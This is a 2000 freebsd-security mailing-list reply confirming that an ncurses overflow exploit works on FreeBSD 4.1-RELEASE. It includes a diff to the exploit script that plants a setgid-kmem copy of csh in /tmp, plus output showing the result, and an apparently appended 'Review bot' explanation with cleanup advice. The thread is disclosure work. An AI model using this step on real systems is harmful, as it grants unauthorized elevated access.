Date: Tue, 10 Oct 2000 17:50:13 -0700
From: Steve Reid <sreid@sea-to-sky.net>
To: Mike Silbersack <silby@silby.com>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ncurses buffer overflows (fwd)
Message-ID: <20001010175013.D9112@grok>
In-Reply-To: <Pine.BSF.4.21.0010101908580.4266-100000@achilles.silby.com>; from Mike Silbersack on Tue, Oct 10, 2000 at 07:11:01PM -0500
References: <20001010165908.C9112@grok> <Pine.BSF.4.21.0010101908580.4266-100000@achilles.silby.com>

On Tue, Oct 10, 2000 at 07:11:01PM -0500, Mike Silbersack wrote:
> Well, the advisory states that ncurses 5.0 and before are vulnerable. It
> looks like 5.1-prerelease is what 4.1+ are using. So, until we hear more
> from warner/kris, I'm assuming that 4.0/3.x are vulnerable, but 4.1+ is
> safe.

The exploit just needs slight modification:

--- exploit.csh.orig Tue Oct 10 17:42:49 2000 +++ exploit.csh Tue Oct 10 17:46:53 2000 @@ -11,7 +11,7 @@ #!/bin/csh cp /bin/csh /tmp -/usr/sbin/chown venglin.kmem /tmp/csh +chgrp kmem /tmp/csh chmod 2755 /tmp/csh __EOF__

4.1-R _is_ exploitable:

steve@grok:/home/steve% ./exploit.csh
-rwxr-sr-x 1 steve kmem 622908 Oct 10 17:48 /tmp/csh
steve@grok:/home/steve% uname -srm
FreeBSD 4.1-RELEASE i386
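
Review bot: the `chmod 2755 /tmp/csh` context line that follows the changed `chgrp kmem /tmp/csh` line leaves a world-executable setgid-kmem copy of csh in /tmp, and nothing in the visible hunk removes it. Anyone reproducing this on a 4.1-RELEASE test machine should delete /tmp/csh afterwards and check the system for other unexpected setgid kmem files. The change also drops the hard-coded `venglin` owner from the removed `chown venglin.kmem` line, so the file ends up owned by whoever runs the script, which matches the `steve kmem` owner and group in the listing shown in the message.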